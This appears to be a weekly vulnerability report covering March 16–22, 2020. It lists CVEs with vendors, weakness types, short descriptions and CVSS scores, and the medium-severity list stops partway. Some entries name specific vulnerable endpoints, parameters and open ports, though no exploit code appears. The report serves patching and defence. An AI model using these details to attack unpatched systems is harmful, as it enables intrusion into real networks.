Weekly Vulnerabilities Reports > March 16 to 22, 2020

Overview

358 new vulnerabilities reported during this period, including 29 critical vulnerabilities and 56 high severity vulnerabilities. This weekly summary report vulnerabilities in 349 products from 156 vendors including Onap, Redhat, Cpanel, Netsas, and Frappe. Vulnerabilities are notably categorized as "Cross-site Scripting", "Improper Input Validation", "SQL Injection", "Improper Privilege Management", and "OS Command Injection".

  • 314 reported vulnerabilities are remotely exploitables.
  • 1 reported vulnerabilities have public exploit available.
  • 155 reported vulnerabilities are related to weaknesses in OWASP Top Ten.
  • 258 reported vulnerabilities are exploitable by an anonymous user.
  • Onap has the most reported vulnerabilities, with 21 reported vulnerabilities.
  • Trendmicro has the most reported critical vulnerabilities, with 3 reported vulnerabilities.

TOTAL
VULNERABILITIES
CRITICAL RISK
VULNERABILITIES
HIGH RISK
VULNERABILITIES
MEDIUM RISK
VULNERABILITIES
LOW RISK
VULNERABILITIES
REMOTELY
EXPLOITABLE
LOCALLY
EXPLOITABLE
EXPLOIT
AVAILABLE
EXPLOITABLE
ANONYMOUSLY
AFFECTING
WEB APPLICATION

Vulnerability Details

The following table list reported vulnerabilities for the period covered by this report:

Expand/Hide

29 Critical Vulnerabilities

DATE CVE VENDOR VULNERABILITY CVSS
2020-03-20 CVE-2019-19148 Tellabs OS Command Injection vulnerability in Tellabs Optical Line Terminal 1150 Firmware Ont709.2.50.12

Tellabs Optical Line Terminal (OLT) 1150 devices allow Remote Command Execution via the -l option to TELNET or SSH.

10.0
2020-03-20 CVE-2018-20334 Asus OS Command Injection vulnerability in Asus Asuswrt 3.0.0.4.384.20308

An issue was discovered in ASUSWRT 3.0.0.4.384.20308.

10.0
2020-03-20 CVE-2019-16072 Netsas OS Command Injection vulnerability in Netsas Enigma Network Management Solution

An OS command injection vulnerability in the discover_and_manage CGI script in NETSAS Enigma NMS 65.0.0 and prior allows an attacker to execute arbitrary code because of improper neutralization of shell metacharacters in the ip_address variable within an snmp_browser action.

10.0
2020-03-19 CVE-2019-12130 Onap Missing Authentication FOR Critical Function vulnerability in Onap Open Network Automation Platform

In ONAP CLI through Dublin, by accessing an applicable port (30234, 30290, 32010, 30270, 30224, 30281, 30254, 30285, and/or 30271), an attacker gains full access to the respective ONAP services without any authentication.

10.0
2020-03-19 CVE-2019-12129 Onap Missing Authentication FOR Critical Function vulnerability in Onap Open Network Automation Platform

In ONAP MSB through Dublin, by accessing an applicable port (30234, 30290, 32010, 30270, 30224, 30281, 30254, 30285, and/or 30271), an attacker gains full access to the respective ONAP services without any authentication.

10.0
2020-03-19 CVE-2019-12128 Onap Missing Authentication FOR Critical Function vulnerability in Onap Open Network Automation Platform

In ONAP SO through Dublin, by accessing an applicable port (30234, 30290, 32010, 30270, 30224, 30281, 30254, 30285, and/or 30271), an attacker gains full access to the respective ONAP services without any authentication.

10.0
2020-03-18 CVE-2020-9423 Logicaldoc Unrestricted Upload of File With Dangerous Type vulnerability in Logicaldoc

LogicalDoc before 8.3.3 could allow an attacker to upload arbitrary files, leading to command execution or retrieval of data from the database.

10.0
2020-03-18 CVE-2020-8599 Trendmicro Unrestricted Upload of File With Dangerous Type vulnerability in Trendmicro Apex ONE and Officescan

Trend Micro Apex One (2019) and OfficeScan XG server contain a vulnerable EXE file that could allow a remote attacker to write arbitrary data to an arbitrary path on affected installations and bypass ROOT login.

10.0
2020-03-18 CVE-2020-8598 Trendmicro Improper Input Validation vulnerability in Trendmicro Apex One, Officescan and Worry-Free Business Security

Trend Micro Apex One (2019), OfficeScan XG and Worry-Free Business Security (9.0, 9.5, 10.0) server contains a vulnerable service DLL file that could allow a remote attacker to execute arbitrary code on affected installations with SYSTEM level privileges.

10.0
2020-03-16 CVE-2020-5847 Unraid Code Injection vulnerability in Unraid 6.8.0

Unraid through 6.8.0 allows Remote Code Execution.

10.0
2020-03-16 CVE-2020-6990 Rockwellautomation USE of Hard-Coded Credentials vulnerability in Rockwellautomation products

Rockwell Automation MicroLogix 1400 Controllers Series B v21.001 and prior, Series A, all versions, MicroLogix 1100 Controller, all versions, RSLogix 500 Software v12.001 and prior, The cryptographic key utilized to help protect the account password is hard coded into the RSLogix 500 binary file.

10.0
2020-03-18 CVE-2020-8470 Trendmicro Improper Input Validation vulnerability in Trendmicro Apex One, Officescan and Worry-Free Business Security

Trend Micro Apex One (2019), OfficeScan XG and Worry-Free Business Security (9.0, 9.5, 10.0) server contains a vulnerable service DLL file that could allow an attacker to delete any file on the server with SYSTEM level privileges.

9.4
2020-03-18 CVE-2019-19676 Arxes Tolina Unspecified vulnerability in Arxes-Tolina 3.0.0

A CSV injection in arxes-tolina 3.0.0 allows malicious users to gain remote control of other computers.

9.3
2020-03-18 CVE-2019-11689 Asustor OS Command Injection vulnerability in Asustor Exfat Driver 1.0.0

An issue was discovered in ASUSTOR exFAT Driver through 1.0.0.r20.

9.3
2020-03-22 CVE-2020-10808 Vestacp OS Command Injection vulnerability in Vestacp Vesta Control Panel

Vesta Control Panel (VestaCP) through 0.9.8-26 allows Command Injection via the schedule/backup Backup Listing Endpoint.

9.0
2020-03-20 CVE-2019-15665 Killernetworking Out-Of-Bounds Write vulnerability in Killernetworking Killer Control Center

An issue was discovered in Rivet Killer Control Center before 2.1.1352.

9.0
2020-03-20 CVE-2019-15661 Killernetworking Out-Of-Bounds Write vulnerability in Killernetworking Killer Control Center

An issue was discovered in Rivet Killer Control Center before 2.1.1352.

9.0
2020-03-19 CVE-2019-16066 Netsas Unrestricted Upload of File With Dangerous Type vulnerability in Netsas Enigma Network Management Solution

An unrestricted file upload vulnerability exists in user and system file upload functions in NETSAS Enigma NMS 65.0.0 and prior.

9.0
2020-03-19 CVE-2019-16065 Netsas SQL Injection vulnerability in Netsas Enigma Network Management Solution

A remote SQL injection web vulnerability was discovered in the Enigma NMS 65.0.0 and prior web application that allows an attacker to execute SQL commands to expose and compromise the web server, expose database tables and values, and potentially execute system-based commands as the mysql user.

9.0
2020-03-19 CVE-2014-2723 Fortinet Incorrect Default Permissions vulnerability in Fortinet products

In FortiBalancer 400, 1000, 2000 and 3000, a platform-specific remote access vulnerability has been discovered that may allow a remote user to gain privileged access to affected systems using SSH.

9.0
2020-03-19 CVE-2014-2722 Fortinet Incorrect Default Permissions vulnerability in Fortinet products

In FortiBalancer 400, 1000, 2000 and 3000, a platform-specific remote access vulnerability has been discovered that may allow a remote user to gain privileged access to affected systems using SSH.

9.0
2020-03-19 CVE-2014-2721 Fortinet Incorrect Default Permissions vulnerability in Fortinet products

In FortiBalancer 400, 1000, 2000 and 3000, a platform-specific remote access vulnerability has been discovered that may allow a remote user to gain privileged access to affected systems using SSH.

9.0
2020-03-18 CVE-2019-18582 Dell Code Injection vulnerability in Dell products

Dell EMC Data Protection Advisor versions 6.3, 6.4, 6.5, 18.2 versions prior to patch 83, and 19.1 versions prior to patch 71 contain a server-side template injection vulnerability in the REST API.

9.0
2020-03-18 CVE-2019-18581 Dell Missing Authorization vulnerability in Dell products

Dell EMC Data Protection Advisor versions 6.3, 6.4, 6.5, 18.2 versions prior to patch 83, and 19.1 versions prior to patch 71 contain a server missing authorization vulnerability in the REST API.

9.0
2020-03-17 CVE-2020-10120 Cpanel Incorrect Authorization vulnerability in Cpanel

cPanel before 84.0.20 allows resellers to achieve remote code execution as root via a cpsrvd rsync shell (SEC-545).

9.0
2020-03-17 CVE-2020-10115 Cpanel Improper Input Validation vulnerability in Cpanel

cPanel before 84.0.20, when PowerDNS is used, allows arbitrary code execution as root via dnsadmin.

9.0
2020-03-17 CVE-2019-11074 Paessler Unrestricted Upload of File With Dangerous Type vulnerability in Paessler Network Monitor

A Write to Arbitrary Location in Disk vulnerability exists in PRTG Network Monitor 19.1.49 and below that allows attackers to place files in arbitrary locations with SYSTEM privileges (although not controlling the contents of such files) due to insufficient sanitisation when passing arguments to the phantomjs.exe binary.

9.0
2020-03-16 CVE-2019-11073 Paessler Injection vulnerability in Paessler Prtg Network Monitor

A Remote Code Execution vulnerability exists in PRTG Network Monitor before 19.4.54.1506 that allows attackers to execute code due to insufficient sanitization when passing arguments to the HttpTransactionSensor.exe binary.

9.0
2020-03-16 CVE-2019-19940 Swisscom OS Command Injection vulnerability in Swisscom Centro Grande Firmware 6.12.02/6.14.00

Incorrect input sanitation in text-oriented user interfaces (telnet, ssh) in Swisscom Centro Grande before 6.16.12 allows remote authenticated users to execute arbitrary commands via command injection.

9.0

56 High Vulnerabilities

DATE CVE VENDOR VULNERABILITY CVSS
2020-03-18 CVE-2019-11688 Asustor Improper Certificate Validation vulnerability in Asustor Exfat Driver 1.0.0

An issue was discovered in ASUSTOR exFAT Driver through 1.0.0.r20.

8.8
2020-03-19 CVE-2019-16012 Cisco SQL Injection vulnerability in Cisco Sd-Wan Firmware

A vulnerability in the web UI of Cisco SD-WAN Solution vManage software could allow an authenticated, remote attacker to conduct SQL injection attacks on an affected system.

8.5
2020-03-20 CVE-2018-20335 Asus Improper Input Validation vulnerability in Asus Asuswrt 3.0.0.4.384.20308

An issue was discovered in ASUSWRT 3.0.0.4.384.20308.

7.8
2020-03-16 CVE-2020-7919 Golang
Debian
Fedoraproject
Netapp
Improper Certificate Validation vulnerability in multiple products

Go before 1.12.16 and 1.13.x before 1.13.7 (and the crypto/cryptobyte package before 0.0.0-20200124225646-8b5121be2f68 for Go) allows attacks on clients (resulting in a panic) via a malformed X.509 certificate.

7.8
2020-03-22 CVE-2020-10806 EZ Unrestricted Upload of File With Dangerous Type vulnerability in EZ Publish-Kernel and EZ Publish-Legacy

eZ Publish Kernel before 5.4.14.1, 6.x before 6.13.6.2, and 7.x before 7.5.6.2 and eZ Publish Legacy before 5.4.14.1, 2017 before 2017.12.7.2, and 2019 before 2019.03.4.2 allow remote attackers to execute arbitrary code by uploading PHP code, unless the vhost configuration permits only app.php execution.

7.5
2020-03-21 CVE-2019-12767 Dlink OS Command Injection vulnerability in Dlink Dap-1650 Firmware

An issue was discovered on D-Link DAP-1650 devices before 1.04B02_J65H Hot Fix.

7.5
2020-03-20 CVE-2020-10799 Svglib Project XXE vulnerability in Svglib Project Svglib

The svglib package through 0.9.3 for Python allows XXE attacks via an svg2rlg call.

7.5
2020-03-20 CVE-2019-11574 Simplemachines Server-Side Request Forgery (SSRF) vulnerability in Simplemachines Simple Machine Forum

An issue was discovered in Simple Machines Forum (SMF) before release 2.0.17.

7.5
2020-03-20 CVE-2019-18641 Sparkdevnetwork Unspecified vulnerability in Sparkdevnetwork Rock RMS

Rock RMS before 1.8.6 mishandles vCard access control within the People/GetVCard/REST controller.

7.5
2020-03-20 CVE-2019-15522 Linbit Unspecified vulnerability in Linbit Csync2 1.34/2.0

An issue was discovered in LINBIT csync2 through 2.0.

7.5
2020-03-20 CVE-2020-8137 Blamer Project Code Injection vulnerability in Blamer Project Blamer

Code injection vulnerability in blamer 1.0.0 and earlier may result in remote code execution when the input can be controlled by an attacker.

7.5
2020-03-20 CVE-2020-8135 Uppy Server-Side Request Forgery (SSRF) vulnerability in Uppy 1.9.1/1.9.2

The uppy npm package < 1.9.3 is vulnerable to a Server-Side Request Forgery (SSRF) vulnerability, which allows an attacker to scan local or external network or otherwise interact with internal systems.

7.5
2020-03-20 CVE-2020-7961 Liferay Deserialization of Untrusted Data vulnerability in Liferay Portal

Deserialization of Untrusted Data in Liferay Portal prior to 7.2.1 CE GA2 allows remote attackers to execute arbitrary code via JSON web services (JSONWS).

7.5
2020-03-20 CVE-2019-12498 3CX Missing Authorization vulnerability in 3CX Wp-Live Chat

The WP Live Chat Support plugin before 8.0.33 for WordPress accepts certain REST API calls without invoking the wplc_api_permission_check protection mechanism.

7.5
2020-03-19 CVE-2019-12127 Onap Missing Authentication for Critical Function vulnerability in Onap Open Network Automation Platform 3.0.0/3.0.1/3.0.2

In ONAP OOM through Dublin, by accessing an applicable port (30234, 30290, 32010, 30270, 30224, 30281, 30254, 30285, and/or 30271), an attacker gains full access to the respective ONAP services without any authentication.

7.5
2020-03-19 CVE-2019-12126 Onap Missing Authentication for Critical Function vulnerability in Onap Open Network Automation Platform 3.0.0/3.0.1/3.0.2

In ONAP DCAE through Dublin, by accessing an applicable port (30234, 30290, 32010, 30270, 30224, 30281, 30254, 30285, and/or 30271), an attacker gains full access to the respective ONAP services without any authentication.

7.5
2020-03-19 CVE-2019-12125 Onap Missing Authentication for Critical Function vulnerability in Onap Open Network Automation Platform 3.0.0/3.0.1/3.0.2

In ONAP Logging through Dublin, by accessing an applicable port (30234, 30290, 32010, 30270, 30224, 30281, 30254, 30285, and/or 30271), an attacker gains full access to the respective ONAP services without any authentication.

7.5
2020-03-19 CVE-2019-16382 Ivanti Unspecified vulnerability in Ivanti Workspace Control 10.3.110.0

An issue was discovered in Ivanti Workspace Control 10.3.110.0.

7.5
2020-03-18 CVE-2020-10674 Perlspeak Project OS Command Injection vulnerability in Perlspeak Project Perlspeak

PerlSpeak through 2.01 allows attackers to execute arbitrary OS commands, as demonstrated by use of system and 2-argument open.

7.5
2020-03-18 CVE-2019-12132 Onap OS Command Injection vulnerability in Onap Open Network Automation Platform 3.0.0/3.0.1/3.0.2

An issue was discovered in ONAP SDNC before Dublin.

7.5
2020-03-18 CVE-2019-12120 Onap Code Injection vulnerability in Onap Open Network Automation Platform 3.0.0/3.0.1/3.0.2

An issue was discovered in ONAP VNFSDK through Dublin.

7.5
2020-03-18 CVE-2019-12119 Onap Code Injection vulnerability in Onap Open Network Automation Platform 3.0.0/3.0.1/3.0.2

An issue was discovered in ONAP SDC through Dublin.

7.5
2020-03-18 CVE-2019-12118 Onap Code Injection vulnerability in Onap Open Network Automation Platform 3.0.0/3.0.1/3.0.2

An issue was discovered in ONAP SDC through Dublin.

7.5
2020-03-18 CVE-2019-12117 Onap Code Injection vulnerability in Onap Open Network Automation Platform 3.0.0/3.0.1/3.0.2

An issue was discovered in ONAP SDC through Dublin.

7.5
2020-03-18 CVE-2019-12116 Onap Code Injection vulnerability in Onap Open Network Automation Platform 3.0.0/3.0.1/3.0.2

An issue was discovered in ONAP SDC through Dublin.

7.5
2020-03-18 CVE-2019-12115 Onap Code Injection vulnerability in Onap Open Network Automation Platform 3.0.0/3.0.1/3.0.2

An issue was discovered in ONAP SDC through Dublin.

7.5
2020-03-18 CVE-2019-12114 Onap Code Injection vulnerability in Onap Open Network Automation Platform 3.0.0/3.0.1/3.0.2

An issue was discovered in ONAP HOLMES before Dublin.

7.5
2020-03-18 CVE-2019-12112 Onap OS Command Injection vulnerability in Onap Open Network Automation Platform 3.0.0/3.0.1/3.0.2

An issue was discovered in ONAP SDNC before Dublin.

7.5
2020-03-18 CVE-2020-3922 Armorx SQL Injection vulnerability in Armorx Lisomail

LisoMail, by ArmorX, allows SQL Injections, attackers can access the database without authentication via a URL parameter manipulation.

7.5
2020-03-18 CVE-2020-8600 Trendmicro Path Traversal vulnerability in Trendmicro Worry-Free Business Security 10.0/9.0/9.5

Trend Micro Worry-Free Business Security (9.0, 9.5, 10.0) is affected by a directory traversal vulnerability that could allow an attacker to manipulate a key file to bypass authentication.

7.5
2020-03-17 CVE-2020-10121 Cpanel Unspecified vulnerability in Cpanel

cPanel before 84.0.20 allows a demo account to achieve code execution via PassengerApps APIs (SEC-546).

7.5
2020-03-17 CVE-2020-10119 Cpanel Unspecified vulnerability in Cpanel

cPanel before 84.0.20 allows a demo account to achieve remote code execution via a cpsrvd rsync shell (SEC-544).

7.5
2020-03-17 CVE-2019-20498 Cpanel Unspecified vulnerability in Cpanel

cPanel before 82.0.18 allows WebDAV authentication bypass because the connection-sharing logic is incorrect (SEC-534).

7.5
2020-03-17 CVE-2020-10380 R Consortium SQL Injection vulnerability in R-Consortium Rmysql

RMySQL through 0.10.19 allows SQL Injection.

7.5
2020-03-16 CVE-2020-9347 Zohocorp Injection vulnerability in Zohocorp Manageengine Password Manager PRO

** DISPUTED ** Zoho ManageEngine Password Manager Pro through 10.x has a CSV Excel Macro Injection vulnerability via a crafted name that is mishandled by the Export Passwords feature.

7.5
2020-03-16 CVE-2020-8786 Salesagility SQL Injection vulnerability in Salesagility Suitecrm

SuiteCRM 7.10.x versions prior to 7.10.23 and 7.11.x versions prior to 7.11.11 allow SQL Injection (issue 4 of 4).

7.5
2020-03-16 CVE-2020-8785 Salesagility SQL Injection vulnerability in Salesagility Suitecrm

SuiteCRM 7.10.x versions prior to 7.10.23 and 7.11.x versions prior to 7.11.11 allow SQL Injection (issue 3 of 4).

7.5
2020-03-16 CVE-2020-8784 Salesagility SQL Injection vulnerability in Salesagility Suitecrm

SuiteCRM 7.10.x versions prior to 7.10.23 and 7.11.x versions prior to 7.11.11 allow SQL Injection (issue 2 of 4).

7.5
2020-03-16 CVE-2020-8783 Salesagility SQL Injection vulnerability in Salesagility Suitecrm

SuiteCRM 7.10.x versions prior to 7.10.23 and 7.11.x versions prior to 7.11.11 allow SQL Injection (issue 1 of 4).

7.5
2020-03-16 CVE-2019-19212 Dolibarr Cross-Site Scripting vulnerability in Dolibarr

Dolibarr ERP/CRM 3.0 through 10.0.3 allows XSS via the qty parameter to product/fournisseurs.php (product price screen).

7.5
2020-03-16 CVE-2020-10243 Joomla SQL Injection vulnerability in Joomla Joomla!

An issue was discovered in Joomla! before 3.9.16.

7.5
2020-03-16 CVE-2020-10230 Centos Webpanel SQL Injection vulnerability in Centos-Webpanel Centos web Panel

CentOS-WebPanel.com (aka CWP) CentOS Web Panel (for CentOS 6 and 7) allows SQL Injection via the /cwp_{SESSION_HASH}/admin/loader_ajax.php term parameter.

7.5
2020-03-16 CVE-2019-19208 Codiad Code Injection vulnerability in Codiad

Codiad Web IDE through 2.8.4 allows PHP Code injection.

7.5
2020-03-16 CVE-2020-5547 Mitsubishielectric Improper Input Validation vulnerability in Mitsubishielectric Iu1-1M20-D Firmware

Resource Management Errors vulnerability in TCP function included in the firmware of Mitsubishi Electric MELQIC IU1 series IU1-1M20-D firmware version 1.0.7 and earlier allows remote attackers to stop the network functions or execute malware via a specially crafted packet.

7.5
2020-03-16 CVE-2020-5545 Mitsubishielectric Unspecified vulnerability in Mitsubishielectric Iu1-1M20-D Firmware

TCP function included in the firmware of Mitsubishi Electric MELQIC IU1 series IU1-1M20-D firmware version 1.0.7 and earlier allows remote attackers to bypass access restriction and to stop the network functions or execute malware via a specially crafted packet.

7.5
2020-03-16 CVE-2020-5544 Mitsubishielectric Null Pointer Dereference vulnerability in Mitsubishielectric Iu1-1M20-D Firmware

Null Pointer Dereference vulnerability in TCP function included in the firmware of Mitsubishi Electric MELQIC IU1 series IU1-1M20-D firmware version 1.0.7 and earlier allows remote attackers to stop the network functions or execute malware via a specially crafted packet.

7.5
2020-03-16 CVE-2020-5543 Mitsubishielectric Session Fixation vulnerability in Mitsubishielectric Iu1-1M20-D Firmware

TCP function included in the firmware of Mitsubishi Electric MELQIC IU1 series IU1-1M20-D firmware version 1.0.7 and earlier does not properly manage sessions, which allows remote attackers to stop the network functions or execute malware via a specially crafted packet.

7.5
2020-03-16 CVE-2020-5542 Mitsubishielectric Improper Restriction of Operations Within the Bounds of A Memory Buffer vulnerability in Mitsubishielectric Iu1-1M20-D Firmware

Buffer error vulnerability in TCP function included in the firmware of Mitsubishi Electric MELQIC IU1 series IU1-1M20-D firmware version 1.0.7 and earlier allows remote attackers to stop the network functions or execute malware via a specially crafted packet.

7.5
2020-03-20 CVE-2019-16258 HOM EE Missing Authentication FOR Critical Function vulnerability in Hom.Ee Brain Cube Firmware

The bootloader of the homee Brain Cube V2 through 2.23.0 allows attackers with physical access to gain root access by manipulating the U-Boot environment via the CLI after connecting to the internal UART interface.

7.2
2020-03-19 CVE-2020-3266 Cisco OS Command Injection vulnerability in Cisco Sd-Wan Firmware

A vulnerability in the CLI of Cisco SD-WAN Solution software could allow an authenticated, local attacker to inject arbitrary commands that are executed with root privileges.

7.2
2020-03-19 CVE-2020-3265 Cisco Improper Privilege Management vulnerability in Cisco Sd-Wan Firmware

A vulnerability in Cisco SD-WAN Solution software could allow an authenticated, local attacker to elevate privileges to root on the underlying operating system.

7.2
2020-03-18 CVE-2020-10665 Docker Improper Privilege Management vulnerability in Docker Desktop

Docker Desktop allows local privilege escalation to NT AUTHORITY\SYSTEM because it mishandles the collection of diagnostics with Administrator privileges, leading to arbitrary DACL permissions overwrites and arbitrary file writes.

7.2
2020-03-17 CVE-2020-3950 Vmware Improper Privilege Management vulnerability in VMWare Fusion, Horizon Client and Remote Console

VMware Fusion (11.x before 11.5.2), VMware Remote Console for Mac (11.x and prior before 11.0.1) and Horizon Client for Mac (5.x and prior before 5.4.0) contain a privilege escalation vulnerability due to improper use of setuid binaries.

7.2
2020-03-16 CVE-2020-3947 Vmware USE After Free vulnerability in VMWare Fusion and Workstation

VMware Workstation (15.x before 15.5.2) and Fusion (11.x before 11.5.2) contain a use-after vulnerability in vmnetdhcp.

7.2
2020-03-16 CVE-2019-5543 Vmware
Microsoft
Incorrect Permission Assignment for Critical Resource vulnerability in VMWare Horizon Client, Remote Console and Workstation

For VMware Horizon Client for Windows (5.x and prior before 5.3.0), VMware Remote Console for Windows (10.x before 11.0.0), VMware Workstation for Windows (15.x before 15.5.2) the folder containing configuration files for the VMware USB arbitration service was found to be writable by all users.

7.2
2020-03-20 CVE-2020-10558 Tesla Improper Privilege Management vulnerability in Tesla Model 3 web Interface

The driving interface of Tesla Model 3 vehicles in any release before 2020.4.10 allows Denial of Service to occur due to improper process separation, which allows attackers to disable the speedometer, web browser, climate controls, turn signal visual and sounds, navigation, autopilot notifications, along with other miscellaneous functions from the main screen.

7.1

228 Medium Vulnerabilities

DATE CVE VENDOR VULNERABILITY CVSS
2020-03-21 CVE-2020-10800 LIX Project Authorization Bypass Through User-Controlled KEY vulnerability in LIX Project LIX

lix through 15.8.7 allows man-in-the-middle attackers to execute arbitrary code by modifying the HTTP client-server data stream so that the Location header is associated with attacker-controlled executable content in the postDownload field.

6.8
2020-03-21 CVE-2013-7487 Swann Injection vulnerability in Swann products

On Swann DVR04B, DVR08B, DVR-16CIF, and DVR16B devices, raysharpdvr application has a vulnerable call to “system”, which allows remote attackers to execute arbitrary code via TCP port 9000.

6.8
2020-03-20 CVE-2020-8882 Foxitsoftware Access of Uninitialized Pointer vulnerability in Foxitsoftware Foxit Studio Photo

This vulnerability allows remote attackers to execute arbitrary code on affected installations of Foxit Studio Photo 3.6.6.916.

6.8
2020-03-20 CVE-2020-8881 Foxitsoftware USE After Free vulnerability in Foxitsoftware Foxit Studio Photo

This vulnerability allows remote attackers to execute arbitrary code on affected installations of Foxit Studio Photo 3.6.6.916.

6.8
2020-03-20 CVE-2020-8880 Foxitsoftware Out-Of-Bounds Read vulnerability in Foxitsoftware Foxit Studio Photo

This vulnerability allows remote attackers to execute arbitrary code on affected installations of Foxit Studio Photo 3.6.6.916.

6.8
2020-03-20 CVE-2020-8878 Foxitsoftware Out-Of-Bounds Write vulnerability in Foxitsoftware Foxit Studio Photo

This vulnerability allows remote attackers to execute arbitrary code on affected installations of Foxit Studio Photo 3.6.6.916.

6.8
2020-03-20 CVE-2020-1864 Huawei Improper Authentication vulnerability in Huawei Secospace Antiddos8000 Firmware

Some Huawei products have a security vulnerability due to improper authentication.

6.8
2020-03-20 CVE-2020-10682 Cmsmadesimple Unrestricted Upload of File With Dangerous Type vulnerability in Cmsmadesimple CMS Made Simple 2.2.13

The Filemanager in CMS Made Simple 2.2.13 allows remote code execution via a .php.jpegd JPEG file, as demonstrated by m1_files[] to admin/moduleinterface.php.

6.8
2020-03-20 CVE-2019-19025 Cncf
Pivotal
Cross-Site Request Forgery (CSRF) vulnerability in multiple products

Cloud Native Computing Foundation Harbor prior to 1.8.6 and 1.9.3 allows CSRF in the VMware Harbor Container Registry for the Pivotal Platform.

6.8
2020-03-19 CVE-2019-16068 Netsas Cross-Site Request Forgery (CSRF) vulnerability in Netsas Enigma Network Management Solution

A CSRF vulnerability exists in NETSAS ENIGMA NMS version 65.0.0 and prior that could allow an attacker to be able to trick a victim into submitting a malicious manage_files.cgi request.

6.8
2020-03-19 CVE-2020-10671 Canon Cross-Site Request Forgery (CSRF) vulnerability in Canon OCE Colorwave 500 Firmware 4.0.0.0

The Canon Oce Colorwave 500 4.0.0.0 printer's web application is missing any form of CSRF protections.

6.8
2020-03-19 CVE-2019-16338 Hancom USE After Free vulnerability in Hancom Office NEO 9.6.1.7634

The tfo_common component in HwordApp.dll in Hancom Office 9.6.1.7634 allows a use-after-free via a crafted .docx file.

6.8
2020-03-19 CVE-2019-16337 Hancom USE After Free vulnerability in Hancom Office NEO 9.6.1.9403

The hncbd90 component in Hancom Office 9.6.1.9403 allows a use-after-free via an unknown object in a crafted .docx file.

6.8
2020-03-19 CVE-2020-10648 Denx
Opensuse
Improper Input Validation vulnerability in multiple products

Das U-Boot through 2020.01 allows attackers to bypass verified boot restrictions and subsequently boot arbitrary images by providing a crafted FIT image to a system configured to boot the default configuration.

6.8
2020-03-18 CVE-2020-10673 Fasterxml
Debian
Netapp
Oracle
FasterXML jackson-databind 2.x before 2.9.10.4 mishandles the interaction between serialization gadgets and typing, related to com.caucho.config.types.ResourceRef (aka caucho-quercus).
6.8
2020-03-18 CVE-2020-10672 Fasterxml
Debian
Netapp
Oracle
FasterXML jackson-databind 2.x before 2.9.10.4 mishandles the interaction between serialization gadgets and typing, related to org.apache.aries.transaction.jms.internal.XaPooledConnectionFactory (aka aries.transaction.jms).
6.8
2020-03-18 CVE-2019-12769 Solarwinds Cross-Site Request Forgery (CSRF) vulnerability in Solarwinds Serv-U Managed File Transfer 15.1.5/15.1.6

SolarWinds Serv-U Managed File Transfer (MFT) Web client before 15.1.6 Hotfix 2 is vulnerable to Cross-Site Request Forgery in the file upload functionality via ?Command=Upload with the Dir and File parameters.

6.8
2020-03-18 CVE-2020-7002 Deltaww Out-Of-Bounds Write vulnerability in Deltaww Cncsoft Screeneditor 1.00.88/1.00.96

Delta Industrial Automation CNCSoft ScreenEditor, v1.00.96 and prior.

6.8
2020-03-17 CVE-2018-21037 Intelliants Cross-Site Request Forgery (CSRF) vulnerability in Intelliants Subrion

Subrion CMS 4.1.5 (and possibly earlier versions) allow CSRF to change the administrator password via the panel/members/edit/1 URI.

6.8
2020-03-16 CVE-2020-9346 Zohocorp Cross-Site Request Forgery (CSRF) vulnerability in Zohocorp Manageengine Password Manager PRO

Zoho ManageEngine Password Manager Pro 10.4 and prior has no protection against Cross-site Request Forgery (CSRF) attacks, as demonstrated by changing a user's role.

6.8
2020-03-16 CVE-2020-7982 Openwrt Injection vulnerability in Openwrt Lede and Openwrt

An issue was discovered in OpenWrt 18.06.0 to 18.06.6 and 19.07.0, and LEDE 17.01.0 to 17.01.7.

6.8
2020-03-16 CVE-2019-20326 Gnome
Linuxmint
Out-Of-Bounds Write vulnerability in multiple products

A heap-based buffer overflow in _cairo_image_surface_create_from_jpeg() in extensions/cairo_io/cairo-image-surface-jpeg.c in GNOME gThumb before 3.8.3 and Linux Mint Pix before 2.4.5 allows attackers to cause a crash and potentially execute arbitrary code via a crafted JPEG file.

6.8
2020-03-16 CVE-2020-6585 Nagios Cross-Site Request Forgery (CSRF) vulnerability in Nagios 2.1.3

Nagios Log Server 2.1.3 has CSRF.

6.8
2020-03-16 CVE-2020-10241 Joomla Cross-Site Request Forgery (CSRF) vulnerability in Joomla Joomla!

An issue was discovered in Joomla! before 3.9.16.

6.8
2020-03-19 CVE-2020-3264 Cisco Classic Buffer Overflow vulnerability in Cisco Sd-Wan Firmware

A vulnerability in Cisco SD-WAN Solution software could allow an authenticated, local attacker to cause a buffer overflow on an affected device.

6.6
2020-03-22 CVE-2020-10818 Articatech OS Command Injection vulnerability in Articatech Artica Proxy 4.26

Artica Proxy 4.26 allows remote command execution for an authenticated user via shell metacharacters in the "Modify the hostname" field.

6.5
2020-03-20 CVE-2019-19487 Centreon OS Command Injection vulnerability in Centreon

Command Injection in minPlayCommand.php in Centreon (19.04.4 and below) allows an attacker to achieve command injection via a plugin test.

6.5
2020-03-20 CVE-2019-19029 Linuxfoundation
Pivotal
SQL Injection vulnerability in multiple products

Cloud Native Computing Foundation Harbor prior to 1.8.6 and 1.9.3 allows SQL Injection via user-groups in the VMware Harbor Container Registry for the Pivotal Platform.

6.5
2020-03-20 CVE-2019-19023 Linuxfoundation
Pivotal
Cloud Native Computing Foundation Harbor prior to 1.8.6 and 1.9.3 has a Privilege Escalation Vulnerability in the VMware Harbor Container Registry for the Pivotal Platform.
6.5
2020-03-20 CVE-2019-16071 Netsas Improper Privilege Management vulnerability in Netsas Enigma NMS 65.0.0

Enigma NMS 65.0.0 and prior allows administrative users to create low-privileged accounts that do not have the ability to modify any settings in the system, only view the components.

6.5
2020-03-19 CVE-2019-16061 Netsas Incorrect Default Permissions vulnerability in Netsas Enigma Network Management Solution

A number of files on the NETSAS Enigma NMS server 65.0.0 and prior are granted weak world-readable and world-writable permissions, allowing any low privileged user with access to the system to read sensitive data (e.g., .htpasswd) and create/modify/delete content (e.g., under /var/www/html/docs) within the operating system.

6.5
2020-03-19 CVE-2019-11361 Zohocorp Incorrect Authorization vulnerability in Zohocorp Manageengine Remote Access Plus 10.0.258

Zoho ManageEngine Remote Access Plus 10.0.258 does not validate user permissions properly, allowing for privilege escalation and eventually a full application takeover.

6.5
2020-03-19 CVE-2020-10678 Octopus Improper Privilege Management vulnerability in Octopus Deploy

In Octopus Deploy before 2020.1.5, for customers running on-premises Active Directory linked to their Octopus server, an authenticated user can leverage a bug to escalate privileges.

6.5
2020-03-19 CVE-2020-4205 IBM Improper Authentication vulnerability in IBM Datapower Gateway

IBM DataPower Gateway 2018.4.1.0 through 2018.4.1.8 could allow an authenticated user to bypass security restrictions, and continue to access the server even after authentication certificates have been revolked.

6.5
